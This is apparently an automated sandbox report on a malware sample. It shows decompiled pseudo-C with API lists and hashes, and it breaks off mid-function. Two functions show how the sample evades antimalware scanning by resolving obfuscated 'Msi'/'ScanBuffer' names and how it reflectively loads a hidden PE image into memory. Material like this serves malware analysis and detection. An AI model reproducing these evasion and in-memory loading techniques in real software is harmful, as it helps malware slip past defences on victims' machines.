                                                                            • Instruction Fuzzy Hash: 0D615E70B001499BDB00FBE5D891A9E76A6DB88304F50D43BB601BB7C6DB3CD919879E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 48%
E00460860(void* __ebx, void* __edi, void* __esi) {
    char _v8;
    char _v12;
    char _v16;
    char _v20;
    intOrPtr _v24;
    intOrPtr _v28;
    char _v32;
    intOrPtr* _t53;
    void* _t60;
    intOrPtr _t61;
    intOrPtr _t64;
    intOrPtr _t67;
    intOrPtr _t74;
    signed int _t75;
    intOrPtr _t86;
    signed int _t91;
    intOrPtr _t99;
    intOrPtr _t104;
    intOrPtr _t105;
    intOrPtr _t107;
    intOrPtr _t108;
    intOrPtr _t112;
    intOrPtr _t114;
    intOrPtr _t126;
    void* _t132;
    void* _t139;
    void* _t140;
    intOrPtr _t143;

    _t140 = __esi;
    _t139 = __edi;
    _push(0);
    _push(0);
    _push(0);
    _push(0);
    _push(0);
    _push(0);
    _push(0);
    _push(_t143);
    _push(0x460b18);
    _push( *[fs:eax]);
    *[fs:eax] = _t143;
    *0x46679c =  *0x46679c - 1;
    if( *0x46679c < 0) {
        0;
        _push(0x124f2); // executed
        L0045F394(); // executed
        if(0 == 0) {
            E00404790(0x466744, 0x460b44);
        } else {
            E00404790(0x466744, "rrrrrrrtutFrk");
        }
        _t99 =  *0x466744; // 0x27d5078
        E00404A4C( &_v8, _t99, 0x460b50);
        E0045EBB0(_v8, 0x4666d8, 0x4666c8, "DllRegisterServer", _t140); // executed
        E004072FC(0x4666c8, L0045F39C);
        if( *0x4666d4 <= 0x206a) {
            0;
            E0045EBB0("mssip32", 0x4666d8, 0x4666c8, "DllRegisterServer", _t140); // executed
            E004072FC(0x4666c8, L0045F39C);
            E00404AC0();
            E00404934( &_v12, E00404C00(_v16));
            _t104 =  *0x4657f8; // 0x400000
            *0x466730 = E0041CF2C(_t104, 1, 0xa, _v12);
            _t53 =  *0x466730; // 0x27ea970
            *0x4666bc =  *((intOrPtr*)( *_t53))(0x460b94,  *0x466744, 0x460b88);
            _t126 =  *0x4666bc; // 0x35986
            E00404E88(0x466768, _t126);
            _t60 = E00404C58(0x466768);
            _t61 =  *0x466730; // 0x27ea970
            _t7 = _t61 + 4; // 0xe
            _t105 =  *0x4666bc; // 0x35986
            E00402EFC( *_t7, 0x4666d8, _t105, _t60);
            _t64 =  *0x466730; // 0x27ea970
            E00403928(_t64);
            _t67 =  *0x466768; // 0x2765838
            E0045F4E8(_t67,  &_v20, 0x460ba0);
            _t107 =  *0x45f30c; // 0x45f310
            E00405BC4(0x46676c, _t107, _v20);
            E0040473C(0x466750);
            _t74 =  *0x46676c; // 0x27b0c98
            _t10 = _t74 + 8; // 0x272fe08
            _t75 =  *_t10;
            __eflags = _t75;
            if(_t75 != 0) {
                _t91 = _t75 - 4;
                __eflags = _t91;
                _t75 =  *_t91;
            }
            __eflags = _t75 - 1;
            if(_t75 >= 1) {
                *0x4666d8 = _t75;
                do {
                    E00404924();
                    _t75 = E00404A08(0x466750, _v24);
                    *0x4666d8 =  *0x4666d8 - 1;
                    __eflags =  *0x4666d8;
                } while ( *0x4666d8 != 0);
            }
            _push(0x460b50);
            _push( *0x466744);
            _push("ScanString");
            E00404AC0();
            _push(_v28);
            _t108 =  *0x466744; // 0x27d5078
            E00404A4C( &_v32, _t108, 0x460b50);
            _pop(_t132);
            E0045EBB0(_v32, 0x4666d8, 0x4666c8, _t132, _t140);
            __eflags = E004072FC(0x4666c8, L0045F39C) * 0x177;
            _t86 =  *0x466750; // 0x26fc4d8, executed
            E0045EEE8(_t86, 0x4666d8, _t139, _t140, E004072FC(0x4666c8, L0045F39C) * 0x177); // executed
        } else {
            L0045F39C();
        }
    }
    _pop(_t112);
    *[fs:eax] = _t112;
    _push(0x460b1f);
    E00404760( &_v32, 3);
    _t114 =  *0x45f30c; // 0x45f310
    E00405B88( &_v20, _t114);
    return E00404760( &_v16, 3);
}

                                                                            APIs
                                                                            • InetIsOffline.URL(000124F2,00000000,00460B18,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0046089B
                                                                            • AuditFree.ADVAPI32(000124F2,00000000,00460B18,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0046090C
                                                                              • Part of subcall function 0045EBB0: LoadLibraryA.KERNEL32(00000000,00000000,0045EC57), ref: 0045EBF9
                                                                              • Part of subcall function 0045EBB0: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0045EC57), ref: 0045EC01
                                                                              • Part of subcall function 0045EBB0: GetProcAddress.KERNEL32(738C0000,00000000), ref: 0045EC35
                                                                            Strings
                                                                            • ScanString , xrefs: 00460A87
                                                                            • DllRegisterServer , xrefs: 004608DF, 00460923
                                                                            • mssip32 , xrefs: 00460928
                                                                            • rrrrrrrtutFrk , xrefs: 004608A9
                                                                            • Msi , xrefs: 004608BA
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AddressAuditFreeHandleInetLibraryLoadModuleOfflineProc
                                                                            • String ID: DllRegisterServer$Msi$ScanString$mssip32$rrrrrrrtutFrk
                                                                            • API String ID: 1378522473-1273433984
                                                                            • Opcode ID: 1a1d8f9adc02558ed4163bbe0ea72374faa3b49d1cfe5cb0d8b7d1e1aed7a199
                                                                            • Instruction ID: bf328fdb3b7fff0191df84ddc3a21c00582c8a3fcbdfa349bb387af89ecb309a
                                                                            • Opcode Fuzzy Hash: 1a1d8f9adc02558ed4163bbe0ea72374faa3b49d1cfe5cb0d8b7d1e1aed7a199
                                                                            • Instruction Fuzzy Hash: 1951B0743002058BD700EBA5D942A6A73A5EB85309F51C07BE900AB7E2EB7CED05CB5F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 40%
E0045EEE8(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
    char _v8;
    char _v16;
    intOrPtr _v20;
    char _v24;
    intOrPtr _t73;
    intOrPtr _t74;
    void* _t81;
    struct HINSTANCE__* _t115;
    intOrPtr _t125;
    long _t127;
    intOrPtr _t128;
    intOrPtr _t130;
    signed int _t135;
    signed int _t139;
    long _t142;
    signed int _t144;
    void* _t147;
    signed int _t150;
    void* _t154;
    void* _t156;
    void* _t157;
    void* _t158;
    intOrPtr _t171;
    intOrPtr _t193;
    void* _t213;
    void* _t225;
    intOrPtr _t230;
    intOrPtr _t232;
    intOrPtr _t234;
    intOrPtr _t235;
    intOrPtr _t236;
    intOrPtr _t237;
    signed int _t241;
    intOrPtr* _t246;

    _push(0);
    _push(0);
    _push(0);
    _push(0);
    _push(0);
    _push(__ebx);
    _v8 = __eax;
    E00404BF0(_v8);
    _push(_t246);
    _push(0x45f200);
    _push( *[fs:eax]);
    *[fs:eax] = _t246;
    E00404790(0x466694, 0x45f21c);
    _push(0xd);
    _push(0xd);
    _push(0x1d);
    E00404A4C( &_v16, _v8, 0x45f228);
    *0x466634 = _v16;
    _push(0xd);
    _push(0xd);
    _push(0x1d);
    _push(0x45f244);
    _push( *0x466694);
    _push("ScanBuffer");
    E00404AC0();
    _push(_v20);
    _t171 =  *0x466694; // 0x27d5088
    E00404A4C( &_v24, _t171, 0x45f244);
    _pop(_t225);
    E0045EBB0(_v24, __ebx, 0x4666a0, _t225, 0x466644);
    E004072FC(0x4666a0, 0x466694);
    _t73 =  *0x466634; // 0x2746268
    _push(0);
    _push(_t73);
    _t74 =  *0x466634; // 0x2746268
    _t10 = _t74 + 0x3c; // 0x100
    asm("cdq");
    asm("adc edx, [esp+0x4]");
    *0x46663c =  *_t10 +  *_t246;
    _push(0xd);
    _push(0xd);
    _push(0x1d);
    _t81 = VirtualAlloc(0,  *( *0x46663c + 0x50), 0x2000, 1); // executed
    *0x466630 = _t81;
    _push(0xd);
    _push(0xd);
    _push(0x1d);
    *0x466638 =  *0x466630 -  *((intOrPtr*)( *0x46663c + 0x34));
    _push(0xd);
    _push(0xd);
    _push(0x1d);
    _t230 =  *0x46663c;
    _t231 =  *(_t230 + 0x14) & 0x0000ffff;
    *0x466640 =  *0x46663c + 0x18 + ( *(_t230 + 0x14) & 0x0000ffff);
    _push(0xd);
    _push(0xd);
    _t193 = 0x10;
    _push(0x1d);
    _t154 = ( *( *0x46663c + 6) & 0x0000ffff) - 1;
    if(_t154 >= 0) {
        _t158 = _t154 + 1;
        *0x466644 = 0;
        do {
            _push(_t193);
            _t135 =  *0x466644 +  *0x466644 * 4;
            _t234 =  *0x466640; // 0x2746460
            _t18 = _t135 * 8; // 0x10550
            *0x46664c =  *(_t234 + _t18 + 8);
            _push(_t193);
            _t139 =  *0x466644 +  *0x466644 * 4;
            _t235 =  *0x466640; // 0x2746460
            _t23 = _t139 * 8; // 0x10600
            *0x466650 =  *((intOrPtr*)(_t235 + _t23 + 0x10));
            _push(_t193);
            _t142 =  *0x46664c; // 0x10
            _t144 =  *0x466644 +  *0x466644 * 4;
            _t236 =  *0x466640; // 0x2746460
            _t28 = _t144 * 8; // 0x1000
            _t147 = VirtualAlloc( *((intOrPtr*)(_t236 + _t28 + 0xc)) +  *0x466630, _t142, 0x1000, 4); // executed
            *0x466648 = _t147;
            _push(_t193);
            _t150 =  *0x466644 +  *0x466644 * 4;
            _t237 =  *0x466640; // 0x2746460
            _t33 = _t150 * 8; // 0x400
            _t231 =  *0x466648; // 0x2e9b000
            _t193 =  *0x466650; // 0x200
            E00402EFC( *((intOrPtr*)(_t237 + _t33 + 0x14)) +  *0x466634, _t158, _t193, _t231);
            *0x466644 =  *0x466644 + 1;
            _t158 = _t158 - 1;
        } while (_t158 != 0);
    }
    _push(0xd);
    _push(0xd);
    _push(0x1d);
    *0x466658 =  *((intOrPtr*)( *0x46663c + 0x28)) +  *0x466630;
    _push(0xd);
    _push(0xd);
    _push(0x1d);
    E0045ECE4( *((intOrPtr*)( *0x46663c + 0xa0)) +  *0x466630);
    _push(0xd);
    _push(0xd);
    _push(0x1d);
    E0045ED90( *((intOrPtr*)( *0x46663c + 0x80)) +  *0x466630, _t154, 0x46663c, 0x466644); // executed
    _push(0xd);
    _push(0xd);
    _t213 = _t193 + 3 - 1 + 4 - 1 + 4 - 1 + 4 - 1 + 1;
    _push(0x1d);
    _t156 = ( *( *0x46663c + 6) & 0x0000ffff) - 1;
    if(_t156 >= 0) {
        _t157 = _t156 + 1;
        *0x466644 = 0;
        do {
            _push(_t213);
            _t241 =  *0x466644 +  *0x466644 * 4;
            _t125 =  *0x466640; // 0x2746460
            _t42 = _t241 * 8; // 0x60000020
            _t127 = E0045EC64( *((intOrPtr*)(_t125 + _t42 + 0x24)), _t231);
            _t128 =  *0x466640; // 0x2746460
            _t45 = _t241 * 8; // 0x10550
            _t130 =  *0x466640; // 0x2746460
            _t48 = _t241 * 8; // 0x1000
            VirtualProtect( *((intOrPtr*)(_t130 + _t48 + 0xc)) +  *0x466630,  *(_t128 + _t45 + 8), _t127, 0x4666a4); // executed
            *0x466644 =  *0x466644 + 1;
            _t157 = _t157 - 1;
        } while (_t157 != 0);
    }
    _t115 =  *0x4666a8; // 0x738c0000
    FreeLibrary(_t115);
    *0x466658( *0x466630, 1, 0, 0x1d, 0xd, 0xd); // executed
    _pop(_t232);
    *[fs:eax] = _t232;
    _push(0x45f207);
    E00404760( &_v24, 3);
    return E0040473C( &_v8);
}

                                                                            0x0045f048
                                                                            0x0045f04e
                                                                            0x0045f04f
                                                                            0x0045f055
                                                                            0x0045f055
                                                                            0x0045f05e
                                                                            0x0045f061
                                                                            0x0045f067
                                                                            0x0045f06b
                                                                            0x0045f070
                                                                            0x0045f079
                                                                            0x0045f07c
                                                                            0x0045f082
                                                                            0x0045f086
                                                                            0x0045f08b
                                                                            0x0045f099
                                                                            0x0045f0a1
                                                                            0x0045f0a4
                                                                            0x0045f0aa
                                                                            0x0045f0b5
                                                                            0x0045f0ba
                                                                            0x0045f0bf
                                                                            0x0045f0c8
                                                                            0x0045f0cb
                                                                            0x0045f0d1
                                                                            0x0045f0db
                                                                            0x0045f0e1
                                                                            0x0045f0e7
                                                                            0x0045f0ec
                                                                            0x0045f0ee
                                                                            0x0045f0ee
                                                                            0x0045f055
                                                                            0x0045f0f9
                                                                            0x0045f0fc
                                                                            0x0045f100
                                                                            0x0045f10d
                                                                            0x0045f116
                                                                            0x0045f119
                                                                            0x0045f11d
                                                                            0x0045f12d
                                                                            0x0045f136
                                                                            0x0045f139
                                                                            0x0045f13d
                                                                            0x0045f14d
                                                                            0x0045f156
                                                                            0x0045f159
                                                                            0x0045f15c
                                                                            0x0045f15d
                                                                            0x0045f165
                                                                            0x0045f168
                                                                            0x0045f16a
                                                                            0x0045f16b
                                                                            0x0045f171
                                                                            0x0045f171
                                                                            0x0045f17f
                                                                            0x0045f182
                                                                            0x0045f187
                                                                            0x0045f18b
                                                                            0x0045f191
                                                                            0x0045f196
                                                                            0x0045f19b
                                                                            0x0045f1a0
                                                                            0x0045f1ab
                                                                            0x0045f1b0
                                                                            0x0045f1b2
                                                                            0x0045f1b2
                                                                            0x0045f171
                                                                            0x0045f1c2
                                                                            0x0045f1c8
                                                                            0x0045f1d7
                                                                            0x0045f1df
                                                                            0x0045f1e2
                                                                            0x0045f1e5
                                                                            0x0045f1f2
                                                                            0x0045f1ff

                                                                            APIs
                                                                              • Part of subcall function 0045EBB0: LoadLibraryA.KERNEL32(00000000,00000000,0045EC57), ref: 0045EBF9
                                                                              • Part of subcall function 0045EBB0: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0045EC57), ref: 0045EC01
                                                                              • Part of subcall function 0045EBB0: GetProcAddress.KERNEL32(738C0000,00000000), ref: 0045EC35
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,0000001D), ref: 0045EFEB
                                                                            • VirtualAlloc.KERNEL32(-00465630,00000010,00001000,00000004,?,?,?,0000001D,0000001D,0000001D,00000000,?,00002000,00000001,0000001D), ref: 0045F0B5
                                                                            • VirtualProtect.KERNEL32(-00465630,00010550,00000000,004666A4,?,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,00000000,?,00002000,00000001), ref: 0045F1AB
                                                                            • FreeLibrary.KERNEL32(738C0000,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,00000000,?,00002000,00000001,0000001D), ref: 0045F1C8
                                                                            Strings
                                                                            • Msi , xrefs: 0045EF1F
                                                                            • ScanBuffer , xrefs: 0045EF66
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Virtual$AllocLibrary$AddressFreeHandleLoadModuleProcProtect
                                                                            • String ID: Msi$ScanBuffer
                                                                            • API String ID: 2006266006-3561555771
                                                                            • Opcode ID: 5ad3b546da17034dca05153c687320dbe9ba89b0f212579352e76a09de489316
                                                                            • Instruction ID: f50dc9b62a688634fe35a12e90ff385b065f388c4a73e1f7ea8b28ac3d343785
                                                                            • Opcode Fuzzy Hash: 5ad3b546da17034dca05153c687320dbe9ba89b0f212579352e76a09de489316
                                                                            • Instruction Fuzzy Hash: 86A17B716902819FE314DF48EC86F3173A8FB45709F21543FFA51DB2A2E6F4A8058E99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 85%
E004543D8(char __edx, void* __edi) {
    char _v5;
    void* __ebx;
    void* __ecx;
    void* __ebp;
    intOrPtr _t25;
    intOrPtr* _t28;
    intOrPtr* _t29;
    intOrPtr* _t48;
    intOrPtr _t59;
    intOrPtr _t60;
    intOrPtr _t61;
    intOrPtr _t62;
    intOrPtr _t65;
    void* _t66;
    char _t67;
    void* _t77;
    struct HDC__* _t78;
    void* _t79;
    void* _t80;

    _t77 = __edi;
    _t67 = __edx;
    if(__edx != 0) {
        _t80 = _t80 + 0xfffffff0;
        _t25 = E00403C34(_t25, _t79);
    }
    _v5 = _t67;
    _t65 = _t25;
    E00420664(_t66, 0);
    _t28 =  *0x462b90; // 0x461bb8
    *((intOrPtr*)(_t28 + 4)) = _t65;
    *_t28 = 0x45477c;
    _t29 =  *0x462ba0; // 0x461bc0
    *((intOrPtr*)(_t29 + 4)) = _t65;
    *_t29 = 0x454788;
    E00454794(_t65);
    *((intOrPtr*)(_t65 + 0x3c)) = GetKeyboardLayout(0);
    *((intOrPtr*)(_t65 + 0x4c)) = E004038F8(1);
    *((intOrPtr*)(_t65 + 0x50)) = E004038F8(1);
    *((intOrPtr*)(_t65 + 0x54)) = E004038F8(1);
    *((intOrPtr*)(_t65 + 0x58)) = E004038F8(1);
    *((intOrPtr*)(_t65 + 0x7c)) = E004038F8(1);
    _t78 = GetDC(0);
    *((intOrPtr*)(_t65 + 0x40)) = GetDeviceCaps(_t78, 0x5a);
    ReleaseDC(0, _t78);
    _t11 = _t65 + 0x58; // 0x44c77c6e
    _t48 =  *0x462d20; // 0x46632c
    *((intOrPtr*)( *_t48))(0, 0, E0045022C,  *_t11);
    *((intOrPtr*)(_t65 + 0x84)) = E004256F8(1);
    *((intOrPtr*)(_t65 + 0x88)) = E004256F8(1);
    *((intOrPtr*)(_t65 + 0x80)) = E004256F8(1);
    E00454BC4(_t65, _t65, _t66, _t77);
    _t15 = _t65 + 0x84; // 0x38004010
    _t59 =  *_t15;
    *((intOrPtr*)(_t59 + 0xc)) = _t65;
    *((intOrPtr*)(_t59 + 8)) = 0x454a94;
    _t18 = _t65 + 0x88; // 0x90000000
    _t60 =  *_t18;
    *((intOrPtr*)(_t60 + 0xc)) = _t65;
    *((intOrPtr*)(_t60 + 8)) = 0x454a94;
    _t21 = _t65 + 0x80; // 0xcc000000
    _t61 =  *_t21;
    *((intOrPtr*)(_t61 + 0xc)) = _t65;
    *((intOrPtr*)(_t61 + 8)) = 0x454a94;
    _t62 = _t65;
    if(_v5 != 0) {
        E00403C8C(_t62);
        _pop( *[fs:0x0]);
    }
    return _t65;
}


                                                                            APIs
                                                                            • GetKeyboardLayout.USER32 ref: 0045441D
                                                                            • GetDC.USER32(00000000), ref: 00454472
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045447C
                                                                            • ReleaseDC.USER32 ref: 00454487
                                                                            Strings
                                                                            • ,cF , xrefs: 0045449A
                                                                            • $BB , xrefs: 004544A5, 004544B7, 004544C9
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CapsDeviceKeyboardLayoutRelease
                                                                            • String ID: $BB$,cF
                                                                            • API String ID: 3331096196-156580243
                                                                            • Opcode ID: 02c75ae8c1627ca64d2ff0d71c190112e98667be6a53cd907d2e82956fb5bcf6
                                                                            • Instruction ID: 0b584d1e58491fa1ea5d4c96f00a0c4a7644df09fe4235dac3e087649deaa05e
                                                                            • Opcode Fuzzy Hash: 02c75ae8c1627ca64d2ff0d71c190112e98667be6a53cd907d2e82956fb5bcf6
                                                                            • Instruction Fuzzy Hash: 9C31D7716042419FD740EF69D8C5B487BE4FB05319F4580BAF818DF3A3EB79A8489B19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
E00454BC4(void* __eax, void* __ebx, void* __ecx, void* __edi) {
    signed char _v5;
    struct tagLOGFONTA _v65;
    struct tagLOGFONTA _v185;
    struct tagLOGFONTA _v245;
    void _v405;
    void* _t23;
    int _t27;
    void* _t30;
    intOrPtr _t38;
    struct HFONT__* _t41;
    struct HFONT__* _t45;
    struct HFONT__* _t49;
    intOrPtr _t52;
    intOrPtr _t54;
    void* _t57;
    intOrPtr _t66;
    void* _t72;
    void* _t74;
    void* _t75;
    intOrPtr _t76;

    _t72 = __edi;
    _t74 = _t75;
    _t76 = _t75 + 0xfffffe6c;
    _t57 = __eax;
    _v5 = 0;
    if( *0x466580 != 0) {
        _t54 =  *0x466580; // 0x27bf470
        _v5 =  *(_t54 + 0x88) & 0x000000ff;
    }
    _push(_t74);
    _push(0x454d0b);
    _push( *[fs:eax]);
    *[fs:eax] = _t76;
    if( *0x466580 != 0) {
        _t52 =  *0x466580; // 0x27bf470
        E00457684(_t52, 0);
    }
    if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
        _t23 = GetStockObject(0xd);
        _t7 = _t57 + 0x84; // 0x38004010
        E00425B48( *_t7, _t23, _t72);
    } else {
        _t49 = CreateFontIndirectA( &_v65); // executed
        _t6 = _t57 + 0x84; // 0x38004010
        E00425B48( *_t6, _t49, _t72);
    }
    _v405 = 0x154;
    _t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
    if(_t27 == 0) {
        _t14 = _t57 + 0x80; // 0xcc000000
        E00425C2C( *_t14, 8);
        _t30 = GetStockObject(0xd);
        _t15 = _t57 + 0x88; // 0x90000000
        E00425B48( *_t15, _t30, _t72);
    } else {
        _t41 = CreateFontIndirectA( &_v185);
        _t11 = _t57 + 0x80; // 0xcc000000
        E00425B48( *_t11, _t41, _t72);
        _t45 = CreateFontIndirectA( &_v245);
        _t13 = _t57 + 0x88; // 0x90000000
        E00425B48( *_t13, _t45, _t72);
    }
    _t16 = _t57 + 0x80; // 0xcc000000
    E004258CC( *_t16, 0xff000017);
    _t17 = _t57 + 0x88; // 0x90000000
    E004258CC( *_t17, 0xff000007);
    _pop(_t66);
    *[fs:eax] = _t66;
    _push(0x454d12);
    if( *0x466580 != 0) {
        _t38 =  *0x466580; // 0x27bf470
        return E00457684(_t38, _v5 & 0x000000ff);
    }
    return 0;
}


                                                                            APIs
                                                                            • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 00454C19
                                                                            • CreateFontIndirectA.GDI32(?), ref: 00454C26
                                                                            • GetStockObject.GDI32(0000000D), ref: 00454C3C
                                                                              • Part of subcall function 00425C2C: MulDiv.KERNEL32(00000000,?,00000048), ref: 00425C39
                                                                            • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00454C65
                                                                            • CreateFontIndirectA.GDI32(?), ref: 00454C75
                                                                            • CreateFontIndirectA.GDI32(?), ref: 00454C8E
                                                                            • GetStockObject.GDI32(0000000D), ref: 00454CB4
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                                            • String ID:
                                                                            • API String ID: 2891467149-0
                                                                            • Opcode ID: 3707ccf87d63a4fde2d24c5a51ee6470f37ba181e11017e0d22171a681295a96
                                                                            • Instruction ID: 0f587122efedf7d321ac9ee3614aa9c37689806316be6897d166c53c05cdaab1
                                                                            • Opcode Fuzzy Hash: 3707ccf87d63a4fde2d24c5a51ee6470f37ba181e11017e0d22171a681295a96
                                                                            • Instruction Fuzzy Hash: 3131D6307042109BEB10EB65DC42B9937E4AB84309F4140B7FD48DB29BEA789848872D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 67%
                                                                                                                                  E03591714(signed int __eax) { 				signed int __ebx; 				signed int __edi; 				signed int __esi; 				void* _t96; 				void** _t99; 				signed int _t104; 				signed int _t109; 				signed int _t110; 				intOrPtr* _t114; 				void* _t116; 				void* _t121; 				signed int _t125; 				signed int _t129; 				signed int _t131; 				signed int _t132; 				signed int _t133; 				signed int _t134; 				signed int _t135; 				unsigned int _t141; 				signed int _t142; 				void* _t144; 				void* _t147; 				intOrPtr _t148; 				signed int _t150; 				long _t156; 				intOrPtr _t159; 				signed int _t162;  				_t129 =  *0x35aa045; // 0x0 				if(__eax > 0xa2c) { 					__eflags = __eax - 0x40a2c; 					if(__eax > 0x40a2c) { 						_pop(_t120); 						__eflags = __eax; 						if(__eax >= 0) { 							_push(_t120); 							_t162 = __eax; 							_t156 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000; 							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed 							_t121 = _t96; 							if(_t121 != 0) { 								_t147 = _t121; 								 *((intOrPtr*)(_t147 + 8)) = _t162; 								 *(_t147 + 0xc) = _t156 | 0x00000004; 								L03591634(); 								_t99 =  *0x35ac7a8; // 0x7f9d0000 								 *_t147 = 0x35ac7a4; 								 *0x35ac7a8 = _t121; 								 *(_t147 + 4) = _t99; 								 *_t99 = _t121; 								 *0x35ac7a0 = 0; 								_t121 = _t121 + 0x10; 							} 							return _t121; 						} else { 							__eflags = 0; 							return 0; 						} 					} else { 						_t125 = (__eax + 0x000000d3 & 0xffffff00) + 0x30; 						__eflags = _t129; 						if(__eflags != 0) { 							while(1) { 								asm("lock cmpxchg [0x35aa710], ah"); 								if(__eflags == 0) { 									goto L39; 								} 								Sleep(0); 								asm("lock cmpxchg [0x35aa710], ah"); 								if(__eflags != 0) { 									Sleep(0xa); 									continue; 								} 								goto L39; 							} 						} 						L39: 						_t141 = 
_t125 - 0xb30; 						_t142 = _t141 >> 0xd; 						_t131 = _t141 >> 8; 						_t104 = 0xffffffff << _t131 &  *(0x35aa720 + _t142 * 4); 						__eflags = 0xffffffff; 						if(0xffffffff == 0) { 							_t132 = _t142; 							__eflags = 0xfffffffe << _t132 &  *0x35aa71c; 							if((0xfffffffe << _t132 &  *0x35aa71c) == 0) { 								_t133 =  *0x35aa718; // 0xee390 								_t134 = _t133 - _t125; 								__eflags = _t134; 								if(_t134 < 0) { 									_t109 = E035915BC(_t125); 								} else { 									_t110 =  *0x35aa714; // 0x380e3a0 									_t109 = _t110 - _t125; 									 *0x35aa714 = _t109; 									 *0x35aa718 = _t134; 									 *(_t109 - 4) = _t125 | 0x00000002; 								} 								 *0x35aa710 = 0; 								return _t109; 							} else { 								asm("bsf edx, eax"); 								asm("bsf ecx, eax"); 								_t135 = _t132 | _t142 << 0x00000005; 								goto L47; 							} 						} else { 							asm("bsf eax, eax"); 							_t135 = _t131 & 0xffffffe0 | _t104; 							L47: 							_push(_t152); 							_push(_t145); 							_t148 = 0x35aa7a0 + _t135 * 8; 							_t159 =  *((intOrPtr*)(_t148 + 4)); 							_t114 =  *((intOrPtr*)(_t159 + 4)); 							 *((intOrPtr*)(_t148 + 4)) = _t114; 							 *_t114 = _t148; 							__eflags = _t148 - _t114; 							if(_t148 == _t114) { 								asm("rol eax, cl"); 								_t80 = 0x35aa720 + _t142 * 4; 								 *_t80 =  *(0x35aa720 + _t142 * 4) & 0xfffffffe; 								__eflags =  *_t80; 								if( *_t80 == 0) { 									asm("btr [0x35aa71c], edx"); 								} 							} 							_t150 = 0xfffffff0 &  *(_t159 - 4); 							_t144 = 0xfffffff0 - _t125; 							__eflags = 0xfffffff0; 							if(0xfffffff0 == 0) { 								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]); 								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7; 								__eflags =  *_t89; 							} else { 								_t116 = _t125 + _t159; 								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3; 								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0; 								__eflags = 0xfffffff0 - 0xb30; 								if(0xfffffff0 >= 0xb30) { 						
